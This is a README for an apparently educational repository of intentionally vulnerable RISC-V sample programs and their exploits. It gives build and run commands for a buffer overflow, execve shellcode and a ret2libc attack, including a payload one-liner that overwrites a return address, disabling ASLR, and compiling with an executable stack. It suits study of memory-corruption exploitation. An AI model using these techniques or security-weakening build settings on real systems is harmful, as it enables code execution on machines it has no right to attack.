RISC-V exploitation

This repository is a small collection of vulnerable sample programs and exploits, tried out on the fedora riscv image: Fedora RISC-V image.

Bufferoverflow:

Compile with:

$ gcc bufferoverflow.c -o bufferoverflow -Ttext=0x55555500

Exploit with:

$ ./bufferoverflow `python -c "print 'C'*8+'B'*8+'\xc0\x55\x55\x55'"`

Shellcode:

Compile with:

$ echo 0 > /proc/sys/kernel/randomize_va_space
$ gcc vuln.c -z execstack -o vuln
$ ld execve.o -o execve -z execstack
$ objcopy -O binary --only-section=.text execve execve.text

Exploit with:

$ ./vuln python attack.py

Ret2libc:

Compile with:

$ gcc vulnerable.c -o vulnerable

Exploit with:

$ ./r.sh ./vulnerable ./exploit

(You can download the script r.sh from https://github.com/hellman/fixenv)

License

MIT